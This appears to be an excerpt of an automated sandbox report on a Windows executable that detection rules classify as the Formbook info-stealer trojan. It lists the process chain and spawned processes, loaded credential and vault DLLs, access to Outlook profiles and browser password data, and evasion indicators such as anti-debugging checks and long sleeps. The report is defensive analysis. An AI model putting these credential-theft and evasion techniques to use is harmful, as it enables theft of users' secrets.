            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030A9C326_2_030A9C32
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030D0CB56_2_030D0CB5
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03020CF26_2_03020CF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EFCF26_2_030EFCF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_005319906_2_00531990
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_005350406_2_00535040
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0053321B6_2_0053321B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_005332206_2_00533220
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0054B6706_2_0054B670
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0052C8C06_2_0052C8C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0052CAE06_2_0052CAE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0052AB606_2_0052AB60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1E2576_2_00D1E257
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1E3736_2_00D1E373
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1E4DB6_2_00D1E4DB
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D254516_2_00D25451
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1D7786_2_00D1D778
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1E7186_2_00D1E718
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1E70C6_2_00D1E70C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1CA336_2_00D1CA33
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000247FBAFA4DB8_2_00000247FBAFA4DB
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000247FBB014518_2_00000247FBB01451
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000247FBAFA3738_2_00000247FBAFA373
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000247FBAF97788_2_00000247FBAF9778
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000247FBAFA70C8_2_00000247FBAFA70C
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000247FBAFA7188_2_00000247FBAFA718
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000247FBAFA2578_2_00000247FBAFA257
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000247FBAF8A338_2_00000247FBAF8A33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 248 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 85 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 0301B970 appears 248 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 03077E54 appears 85 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 0309EA12 appears 84 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 030AF290 appears 103 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 03065130 appears 36 times
            Source: w64HYOhfv1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeFile created: C:\Users\user\AppData\Local\Temp\ambiparousJump to behavior
            Source: w64HYOhfv1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2149425938.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: w64HYOhfv1.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeFile read: C:\Users\user\Desktop\w64HYOhfv1.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\w64HYOhfv1.exe "C:\Users\user\Desktop\w64HYOhfv1.exe"
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\w64HYOhfv1.exe"
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\w64HYOhfv1.exe"Jump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: w64HYOhfv1.exeStatic file information: File size 1363343 > 1048576
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000001.00000002.1963873677.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963858433.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129554800.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ifhdPMDeORMlb.exe, 00000003.00000000.1867261425.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp, ifhdPMDeORMlb.exe, 00000007.00000000.2033224305.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.1964073483.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1847224890.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844685675.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.000000000318E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1965904772.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1964009179.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.1964073483.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1847224890.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844685675.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.4130603764.000000000318E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1965904772.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1964009179.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000006.00000002.4131092895.000000000361C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003BD2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000006.00000002.4131092895.000000000361C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003BD2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000001.00000002.1963873677.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963858433.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129554800.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: w64HYOhfv1.exeStatic PE information: real checksum: 0xa961f should be: 0x154296
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026633B0 push eax; ret 1_2_026633B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02661724 push 0000007Ch; iretd 1_2_02661726
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026834C3 push edi; retf 1_2_026834CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx1_2_030309B6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030209AD push ecx; mov dword ptr [esp], ecx6_2_030209B6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00540110 push edi; retf 6_2_0054011B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00532260 push ds; retf 6_2_00532274
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00540365 push ebp; ret 6_2_00540367
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00537338 push ds; ret 6_2_0053733C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0054038C push ecx; iretd 6_2_0054038F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0053B602 pushfd ; ret 6_2_0053B604
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D25052 push eax; ret 6_2_00D25054
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1F06A push ebp; iretd 6_2_00D1F072
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1C308 push cs; ret 6_2_00D1C309
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D125EE push ebp; ret 6_2_00D125EF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1857A push es; retf 6_2_00D18584
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D156F8 pushad ; iretd 6_2_00D1573F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D14C7E push 00000021h; retf 6_2_00D14C80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1BFE5 push cs; retf 6_2_00D1BFEF
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeAPI/Special instruction interceptor: Address: 420C25C
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD1C0 rdtsc 1_2_030AD1C0
            Source: C:\Windows\SysWOW64\RmClient.exeWindow / User API: threadDelayed 2301Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeWindow / User API: threadDelayed 7671Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\RmClient.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 6288Thread sleep count: 2301 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 6288Thread sleep time: -4602000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 6288Thread sleep count: 7671 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 6288Thread sleep time: -15342000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe TID: 764Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0053C280 FindFirstFileW,FindNextFileW,FindClose,6_2_0053C280
            Source: ifhdPMDeORMlb.exe, 00000007.00000002.4129953313.0000000000D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: firefox.exe, 00000008.00000002.2263936410.00000247FBD7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD1C0 rdtsc 1_2_030AD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02677583 LdrLoadDll,1_2_02677583
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B930B mov eax, dword ptr fs:[00000030h]1_2_030B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B930B mov eax, dword ptr fs:[00000030h]1_2_030B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B930B mov eax, dword ptr fs:[00000030h]1_2_030B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]1_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]1_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F132D mov eax, dword ptr fs:[00000030h]1_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F132D mov eax, dword ptr fs:[00000030h]1_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305F32A mov eax, dword ptr fs:[00000030h]1_2_0305F32A
